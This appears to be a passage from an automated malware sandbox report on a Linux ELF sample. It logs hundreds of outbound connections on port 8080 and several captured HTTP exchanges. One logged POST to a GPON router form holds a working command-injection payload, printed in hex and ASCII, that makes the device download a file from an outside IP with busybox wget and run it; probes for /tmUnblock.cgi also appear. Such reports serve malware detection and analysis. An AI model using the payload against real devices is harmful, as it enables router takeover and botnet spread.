              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 194.238.233.111:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 120.134.143.33:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 195.211.178.123:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 116.223.7.106:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 150.52.112.81:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 157.250.4.93:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 191.235.83.28:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 136.202.52.142:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 123.65.70.175:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 195.57.172.242:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 110.170.191.153:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 121.149.198.122:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 121.78.215.95:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 23.241.236.209:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 180.231.242.243:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 78.3.214.65:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 144.55.245.163:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 159.244.172.78:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 17.60.175.210:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 217.108.192.135:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 113.132.219.156:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 54.141.35.78:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 112.27.203.209:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 17.115.225.92:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 63.99.157.124:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 112.179.166.176:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 166.41.18.147:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 210.115.202.205:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 73.16.84.4:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 186.221.43.79:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 116.51.229.43:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 197.211.254.9:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 107.147.46.222:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 140.151.87.192:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 110.25.6.120:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 153.164.176.68:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 63.141.170.225:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 84.219.114.198:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 151.163.8.156:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 120.114.62.61:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 205.194.210.43:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 216.192.83.1:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 134.161.94.55:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 164.101.122.177:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 53.149.84.92:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 101.82.223.31:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 128.75.228.190:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 185.131.183.81:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 149.53.48.243:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 185.119.76.50:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 83.200.128.162:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 169.153.71.103:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 115.115.113.33:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 72.13.153.188:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 47.81.140.235:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 115.196.146.76:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 210.192.173.72:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 185.173.209.154:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 72.161.189.94:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 66.220.160.142:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 5.65.202.56:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 105.19.15.226:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 191.127.102.81:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 94.225.7.27:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 105.150.195.42:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 132.155.89.168:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 204.195.191.46:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 181.231.150.91:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 122.123.48.205:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 58.85.221.141:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 138.59.63.125:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 48.189.109.148:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 119.23.12.80:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 47.213.221.144:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 120.144.207.230:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 81.198.113.201:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 212.83.185.200:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 136.242.50.120:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 212.114.7.131:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 36.206.52.167:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 59.141.170.14:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 89.40.243.187:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 94.238.57.244:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 213.168.191.184:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 43.248.198.30:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 65.56.184.70:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 8.228.155.8:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 43.197.7.8:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 69.102.252.187:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 99.6.161.55:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 182.238.68.228:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 115.233.125.223:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 151.138.209.239:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 60.162.113.113:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 176.131.107.189:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 178.33.119.98:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 142.9.105.90:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 144.179.162.132:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 204.162.149.12:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 161.224.231.3:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 183.61.36.238:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 46.220.255.48:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 131.143.247.56:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 115.162.102.87:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 219.89.69.157:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 177.252.4.7:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 101.120.246.254:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 114.232.198.104:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 171.114.193.133:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 87.149.159.28:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 45.197.134.78:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 73.47.244.91:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 175.233.24.41:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 25.53.9.128:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 8.239.46.50:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 58.7.237.35:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 13.55.0.82:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 27.3.86.210:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 8.20.93.50:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 149.181.1.82:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 154.81.85.65:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 12.108.146.52:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 164.13.152.162:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 205.164.66.207:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 205.27.158.226:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 104.130.172.191:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 84.218.250.166:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 118.117.149.23:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 194.111.153.244:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 146.77.177.210:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 76.174.199.142:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 176.5.150.218:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 199.83.162.165:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 210.209.159.123:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 144.112.145.37:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 171.94.2.179:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 157.245.76.142:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 197.232.151.175:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 52.33.206.182:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 17.69.83.136:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 161.107.165.159:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 117.23.163.16:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 66.60.16.46:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 213.174.131.140:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 138.152.205.120:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 88.238.192.206:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 138.186.78.30:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 46.55.202.208:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 110.250.64.14:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 195.37.237.225:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 131.254.224.1:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 196.117.167.244:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 24.29.132.216:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 74.45.205.189:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 92.111.118.42:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 195.76.155.238:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 104.5.180.83:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 118.220.25.10:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 1.239.25.96:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 180.236.205.43:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 209.140.116.219:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 59.237.133.240:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 133.251.60.106:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 187.39.200.229:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 80.67.178.174:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 108.7.244.154:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 48.80.180.22:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 166.38.1.104:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 141.205.127.171:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 58.60.149.192:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 182.14.61.136:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 18.103.102.63:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 177.152.17.99:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 116.134.213.8:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 170.162.41.132:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 68.209.103.145:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 136.190.201.232:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 171.253.90.101:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 81.216.71.235:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 99.242.4.250:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 117.225.226.218:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 208.224.43.35:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 72.173.236.112:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 165.152.76.185:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 110.33.207.152:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 25.92.175.81:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 64.178.172.18:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 157.224.40.107:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 203.33.130.228:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 18.3.131.38:8080
              Source: /tmp/CuruFoiJiK.elf (PID: 5513)Socket: 127.0.0.1::45837Jump to behavior
              Source: unknownTCP traffic detected without corresponding DNS query: 204.44.123.90
              Source: unknownTCP traffic detected without corresponding DNS query: 99.169.61.90
              Source: unknownTCP traffic detected without corresponding DNS query: 88.29.85.197
              Source: unknownTCP traffic detected without corresponding DNS query: 199.169.249.147
              Source: unknownTCP traffic detected without corresponding DNS query: 169.227.134.109
              Source: unknownTCP traffic detected without corresponding DNS query: 198.32.129.71
              Source: unknownTCP traffic detected without corresponding DNS query: 81.53.117.178
              Source: unknownTCP traffic detected without corresponding DNS query: 177.209.43.38
              Source: unknownTCP traffic detected without corresponding DNS query: 41.15.80.150
              Source: unknownTCP traffic detected without corresponding DNS query: 63.118.126.165
              Source: unknownTCP traffic detected without corresponding DNS query: 142.233.98.46
              Source: unknownTCP traffic detected without corresponding DNS query: 130.214.227.140
              Source: unknownTCP traffic detected without corresponding DNS query: 99.234.36.54
              Source: unknownTCP traffic detected without corresponding DNS query: 65.113.180.119
              Source: unknownTCP traffic detected without corresponding DNS query: 38.165.126.185
              Source: unknownTCP traffic detected without corresponding DNS query: 8.160.66.169
              Source: unknownTCP traffic detected without corresponding DNS query: 68.162.179.131
              Source: unknownTCP traffic detected without corresponding DNS query: 131.131.19.35
              Source: unknownTCP traffic detected without corresponding DNS query: 128.37.130.124
              Source: unknownTCP traffic detected without corresponding DNS query: 140.172.199.30
              Source: unknownTCP traffic detected without corresponding DNS query: 189.32.85.104
              Source: unknownTCP traffic detected without corresponding DNS query: 100.244.200.66
              Source: unknownTCP traffic detected without corresponding DNS query: 112.243.120.70
              Source: unknownTCP traffic detected without corresponding DNS query: 168.33.58.103
              Source: unknownTCP traffic detected without corresponding DNS query: 14.207.95.216
              Source: unknownTCP traffic detected without corresponding DNS query: 109.113.4.23
              Source: unknownTCP traffic detected without corresponding DNS query: 170.216.241.156
              Source: unknownTCP traffic detected without corresponding DNS query: 70.98.112.55
              Source: unknownTCP traffic detected without corresponding DNS query: 193.0.27.187
              Source: unknownTCP traffic detected without corresponding DNS query: 5.7.137.252
              Source: unknownTCP traffic detected without corresponding DNS query: 164.1.0.222
              Source: unknownTCP traffic detected without corresponding DNS query: 126.68.245.20
              Source: unknownTCP traffic detected without corresponding DNS query: 163.235.172.73
              Source: unknownTCP traffic detected without corresponding DNS query: 130.79.32.249
              Source: unknownTCP traffic detected without corresponding DNS query: 168.113.233.47
              Source: unknownTCP traffic detected without corresponding DNS query: 51.32.48.188
              Source: unknownTCP traffic detected without corresponding DNS query: 223.220.63.177
              Source: unknownTCP traffic detected without corresponding DNS query: 81.191.68.165
              Source: unknownTCP traffic detected without corresponding DNS query: 102.251.204.171
              Source: unknownTCP traffic detected without corresponding DNS query: 91.225.237.124
              Source: unknownTCP traffic detected without corresponding DNS query: 53.211.16.214
              Source: unknownTCP traffic detected without corresponding DNS query: 211.139.112.188
              Source: unknownTCP traffic detected without corresponding DNS query: 5.216.70.174
              Source: unknownTCP traffic detected without corresponding DNS query: 182.94.20.253
              Source: unknownTCP traffic detected without corresponding DNS query: 42.248.250.30
              Source: unknownTCP traffic detected without corresponding DNS query: 197.217.71.150
              Source: unknownTCP traffic detected without corresponding DNS query: 24.38.180.77
              Source: unknownTCP traffic detected without corresponding DNS query: 80.43.152.205
              Source: unknownTCP traffic detected without corresponding DNS query: 4.249.129.129
              Source: unknownTCP traffic detected without corresponding DNS query: 46.196.42.48
              Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 30 33 2f 62 69 6e 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.142.182.103/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-UA-Compatible: IE=EmulateIE9, requiresActiveX=trueCache-Control: no-store, no-cache, must-revalidateContent-Type: text/htmlContent-Length: 345Date: Thu, 21 Dec 2023 16:02:42 GMTServer: lighttpd/1.4.35Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 23:01:12 GMTServer: webserverX-Frame-Options: SAMEORIGINContent-Length: 189Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=10, max=5Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /tmUnblock.cgi</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.8.1Date: Thu, 21 Dec 2023 16:01:14 GMTContent-Type: text/htmlContent-Length: 168Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.8.1</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 16:01:29 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.40Content-Length: 211Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmUnblock.cgi was not found on this server.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Thu, 21 Dec 2023 16:01:29 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
